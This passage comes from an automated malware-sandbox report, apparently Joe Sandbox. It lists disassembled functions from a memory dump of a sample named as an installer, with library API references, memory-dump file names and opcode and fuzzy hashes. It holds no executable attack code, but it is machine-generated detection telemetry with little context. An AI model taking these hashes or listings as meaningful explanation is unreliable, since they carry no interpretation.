                                      • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                      • Instruction Fuzzy Hash: D091E031D05299DBCF04EFA4D890AEDBBB5FF07308F20807AD46267A51DB31594ACB96
                                      Function 6CB6A133 Relevance: 3.3, APIs: 2, Instructions: 302COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CB6AFA0
                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CB6B7C3
                                        • Part of subcall function 6CB6CA69: RaiseException.KERNEL32(E06D7363,00000001,00000003,6CB6B7AC,00000000,?,?,?,6CB6B7AC,?,6CB9853C), ref: 6CB6CAC9
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                                      • String ID:
                                      • API String ID: 915016180-0
                                      • Opcode ID: f220899bae2c177bf8fee0aae061286150441ea8b3544fb7d0802721bc683824
                                      • Instruction ID: 3523394891c735374fd4bda2cb855c6f5595e58cabd2864de4e7af880fd66533
                                      • Opcode Fuzzy Hash: f220899bae2c177bf8fee0aae061286150441ea8b3544fb7d0802721bc683824
                                      • Instruction Fuzzy Hash: 56B18CB2A056499FDF04CF67C9816AEBBB4FB09318F24862AE415E7F80D7349644CF90
                                      Function 6CB9B972 Relevance: 2.6, Strings: 2, Instructions: 91COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @4J$DsL
                                      • API String ID: 0-2004129199
                                      • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                      • Instruction ID: 9499f6548ef02e83c308a1f1dad106ee9e05b0a88f3cb7920f4ff7230cc11a59
                                      • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                      • Instruction Fuzzy Hash: 102171377A49564BE74CCA28EC33EB926D0E745305B89627EE94BCB7E1DF5D8800C648
                                      Function 6CBB840A Relevance: 2.3, APIs: 1, Instructions: 760COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBB840F
                                        • Part of subcall function 6CBB9137: __EH_prolog.LIBCMT ref: 6CBB913C
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                                      • Instruction ID: 1a707cac8cf8e8f2b3d28494ad31bf82cbec96d5ce538f599bea7893fb6ea860
                                      • Opcode Fuzzy Hash: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                                      • Instruction Fuzzy Hash: 2062577090429ACFDB15CFA4C890BEEBBB5FF04308F14416AE819BB680DB759A45CF91
                                      Function 6CC10AD0 Relevance: 1.9, Strings: 1, Instructions: 669COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: YA1
                                      • API String ID: 0-613462611
                                      • Opcode ID: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                                      • Instruction ID: 8e61faad7eb8fcfda60d10dd8fdb9dd20b834fe0970259e7233e63d3f2d37da4
                                      • Opcode Fuzzy Hash: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                                      • Instruction Fuzzy Hash: EE42D27060D3818FD315CF2AC49069ABBE2FFD9308F14896DE8D58BB42E675D906CB42
                                      Function 6CC367C0 Relevance: 1.9, APIs: 1, Instructions: 356COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: __aulldiv
                                      • String ID:
                                      • API String ID: 3732870572-0
                                      • Opcode ID: a13d6ee194fb01fface67b9907b125463793f568477540394d21f6f384e52076
                                      • Instruction ID: ec3904e56e4d9a7e00e9d7bd2a08003a941dd09901c1e17d68d0b2414023cb7b
                                      • Opcode Fuzzy Hash: a13d6ee194fb01fface67b9907b125463793f568477540394d21f6f384e52076
                                      • Instruction Fuzzy Hash: 64E17C716087558FC724CF25D880AAAB7F5BFC8318F248A2EE858CB755E7309945CB92
                                      Function 6CBEAD43 Relevance: 1.8, APIs: 1, Instructions: 346COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: a09d6e82890587311bf3c607534608c3e0df372b1a8eae7fe7b1a33e2057bb73
                                      • Instruction ID: 916a206c8437f84ef2b5a97ecc555569e5b95852f34afdb5ed583f7ded2fa158
                                      • Opcode Fuzzy Hash: a09d6e82890587311bf3c607534608c3e0df372b1a8eae7fe7b1a33e2057bb73
                                      • Instruction Fuzzy Hash: B9F13570900389DFCB14CFA8C590BEEBBB1FF09758F148169D449ABA52D770AA89CF51
                                      Function 6CC38D90 Relevance: 1.8, Strings: 1, Instructions: 513COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: b70bb84cdfed215badc6c0dc16625fe684c20b396c3ab56e614d7a8a82e34842
                                      • Instruction ID: 444ec4001b872aca9238f5f143368e624d230379d66f261763673217fce901c1
                                      • Opcode Fuzzy Hash: b70bb84cdfed215badc6c0dc16625fe684c20b396c3ab56e614d7a8a82e34842
                                      • Instruction Fuzzy Hash: 35324AB1A083058FC318CF56C48495AF7E2BFCC314F468A5DE98997355DB74AA09CF86
                                      Function 6CBA3BCA Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: __aullrem
                                      • String ID:
                                      • API String ID: 3758378126-0
                                      • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                      • Instruction ID: 71dd4e1fe8cfd2849cec63c523669d13bd429f48a6a3e8016e67b5453f198391
                                      • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                      • Instruction Fuzzy Hash: F651D971A09295DBD710CF9AC4C02EDFBE6EF79214F14C05EE8C897242D27A995BC760
                                      Function 6CC1CE80 Relevance: 1.7, Strings: 1, Instructions: 424COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                                      • Instruction ID: 50a439f38f246f5c4f5691ad74b123fe7ede2b24c593a95ee372030eaae1cbe4
                                      • Opcode Fuzzy Hash: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                                      • Instruction Fuzzy Hash: C9028A3160C3808BD726CF2AC49079EBBE2AFC9318F144A2DE4D597B51E774D946CB42
                                      Function 6CC39999 Relevance: 1.6, Strings: 1, Instructions: 324COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: b4ce60841bca8fd945d7956f1acfe73c36a86ce5a82225692ce6a5b8030d2b38
                                      • Instruction ID: 236c46e9b48d94a7213ffc5a0b91010720441dad2ab24fe12eee0f760a874ae9
                                      • Opcode Fuzzy Hash: b4ce60841bca8fd945d7956f1acfe73c36a86ce5a82225692ce6a5b8030d2b38
                                      • Instruction Fuzzy Hash: 21D13E729083148FC758DF4AD44005BF7E2BFC8314F1A892EF899A7315DB70A9568BC6
                                      Function 6CC77A46 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: B
                                      • API String ID: 0-1255198513
                                      • Opcode ID: 26643807f12313c04aaa413d9f20b4c0588d72bb55b68c80837e514dee027d31
                                      • Instruction ID: 8d4da670b69815b674b4ad9d61e9c918bc6c84a9d2c08d3090e8073a9fc4c310
                                      • Opcode Fuzzy Hash: 26643807f12313c04aaa413d9f20b4c0588d72bb55b68c80837e514dee027d31
                                      • Instruction Fuzzy Hash: B33126315087518BD314EF28D884AABB3E2FBC4325F60CA3DD89ACBA94E7745415CF41
                                      Function 6CC0DB90 Relevance: .9, Instructions: 940COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c5d8fce23cbaa16ca4a411120887c85bd9f222070fcab5a8c777e9c9c2b1bfe3
                                      • Instruction ID: 8372acc60311ed28cda7ef1555e8df1330648b932256b7ebb0517186512c38bf
                                      • Opcode Fuzzy Hash: c5d8fce23cbaa16ca4a411120887c85bd9f222070fcab5a8c777e9c9c2b1bfe3
                                      • Instruction Fuzzy Hash: E8728DB1A042168FD708CF18C490258FBE1FF89314B5A46ADD99ADB742EB71E8D5CBC1
                                      Function 6CC2D930 Relevance: .7, Instructions: 740COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                                      • Instruction ID: cf7bc7abd7df15897ff96c6356eab00a23d159ef76ba1248e4e6b44f215d496c
                                      • Opcode Fuzzy Hash: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                                      • Instruction Fuzzy Hash: 116215B1A083418FC714CF2AC48091AFBF5BFD8744F248A6EE89997715E774E845CB92
                                      Function 6CC2B950 Relevance: .7, Instructions: 697COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a58f6c5b0b87d5f12fe17b5b5b78f65cee349bf84e9962db46f9d84bc39cd103
                                      • Instruction ID: bdb5bc2569ba0e36a222dd2e5f4d560ed58b9e0c71717ae91ccf5476f553578c
                                      • Opcode Fuzzy Hash: a58f6c5b0b87d5f12fe17b5b5b78f65cee349bf84e9962db46f9d84bc39cd103
                                      • Instruction Fuzzy Hash: 61425D71604B068BD328DF69C8907AAB7E2FB84314F444A2DE897C7B94E778E549CB41
                                      Function 6CC1A1F0 Relevance: .6, Instructions: 634COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf70cfe04b665dc64369caa9c5f3f6957600806d567f090f737c69cac13e6594
                                      • Instruction ID: 83557c71aae1c8e192f17033d4b618012d82c68257b1a69d14fb45888ba72a5b
                                      • Opcode Fuzzy Hash: bf70cfe04b665dc64369caa9c5f3f6957600806d567f090f737c69cac13e6594
                                      • Instruction Fuzzy Hash: 26329171A0824A8BDB08CF1AC8902DE7BA2FFC9354F15852DEC55DBB41E770D959DB80
                                      Function 6CC16D50 Relevance: .5, Instructions: 547COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                                      • Instruction ID: bdf5842230b1d9f3b1a83c321018613331b4f4499b82422fc9f09014373972ad
                                      • Opcode Fuzzy Hash: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                                      • Instruction Fuzzy Hash: 0E129E712097418FC718CF2AC59066ABBE2FF88344F64892DE9D687F41EB31E846DB51
                                      Function 6CC27AA0 Relevance: .5, Instructions: 474COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                      • Instruction ID: cdec46c26066d91302c7b4ec1999e4f39c3e0d315455576c95a565c1131d06f2
                                      • Opcode Fuzzy Hash: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                      • Instruction Fuzzy Hash: 9702FC32A083118FD319CE2CC4D0269BBF2FBC4355F150B2EE496D7A94E7789985DB92
                                      Function 6CC12A50 Relevance: .5, Instructions: 453COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                                      • Instruction ID: 9d8e9894685f98833482fcd6723f6a669426043f5613d9b77a5d59c2dab0aea6
                                      • Opcode Fuzzy Hash: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                                      • Instruction Fuzzy Hash: E6F135366082898FEB24CE29D8647EEB7E2FBC6304F54453DD889C7B40EB35954AD781
                                      Function 6CC19D10 Relevance: .4, Instructions: 429COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 70a9c9e80daef2df3b25ccf8549349f6a1d4fdfd7731b9f920c9a3da36d7342a
                                      • Instruction ID: 76fe018926fffbb1eafed7bd1d33f6ad2dad9c8ac9ea18d3f1bdb05d18707061
                                      • Opcode Fuzzy Hash: 70a9c9e80daef2df3b25ccf8549349f6a1d4fdfd7731b9f920c9a3da36d7342a
                                      • Instruction Fuzzy Hash: B1E1DE71608B018BE724CF2AD4603AAB7E2EBC4314F544A2DC59787F81EB75E50ADB91
                                      Function 6CC31BC0 Relevance: .4, Instructions: 399COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2bbd660b0b6b3ed67628fad2252f6cf995a3246cee064cb0bfa737aff63ec289
                                      • Instruction ID: 3fe0d781f2f6c8a4ee908dcc7c493dfe796eb15bcacaea6488bff05a66915e32
                                      • Opcode Fuzzy Hash: 2bbd660b0b6b3ed67628fad2252f6cf995a3246cee064cb0bfa737aff63ec289
                                      • Instruction Fuzzy Hash: 6FF1D270608B618FC329CF2DE494266FBE1BF89304F184A6ED1DAC7A91E339E554CB51
                                      Function 6CC2F8D0 Relevance: .4, Instructions: 383COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b0f25bae375294626f84eebbb02985cc894b79d37dbce9afd4d280b88824898c
                                      • Instruction ID: 2167bd2108d53fbbbcca412f5a3118018c4192aa1a49c34f46c29c166872dd4e
                                      • Opcode Fuzzy Hash: b0f25bae375294626f84eebbb02985cc894b79d37dbce9afd4d280b88824898c
                                      • Instruction Fuzzy Hash: 33F1E2705087658FC329CF29C49026AFBF1BF85308F188A6ED4D68BB91E379E155CB51
                                      Function 6CC19900 Relevance: .3, Instructions: 341COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2d001f70021adf80f04e27e8359f5713b9c218b059c1a64901c9b96791ed9031
                                      • Instruction ID: b0d7b87553bb7738f1a27e2ebdf17fcb3d764c071028ce868e65b0dfd67d3c10
                                      • Opcode Fuzzy Hash: 2d001f70021adf80f04e27e8359f5713b9c218b059c1a64901c9b96791ed9031
                                      • Instruction Fuzzy Hash: 3CC1B371608B068BE328DF2AC4906ABB7E2FBC5314F548A2DC19787F45E630F595DB81
                                      Function 6CC225C0 Relevance: .3, Instructions: 333COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                      • Instruction ID: 110d3e1e7e7ea248f0e3297d89bec2d290c679db92a94edd369b4bff1182f400
                                      • Opcode Fuzzy Hash: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                      • Instruction Fuzzy Hash: F1D110715146168FD318CF1CC4A8636BBE1FF86314F054ABDEAA28B39AE738D605CB50
                                      Function 6CC37DE0 Relevance: .3, Instructions: 333COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
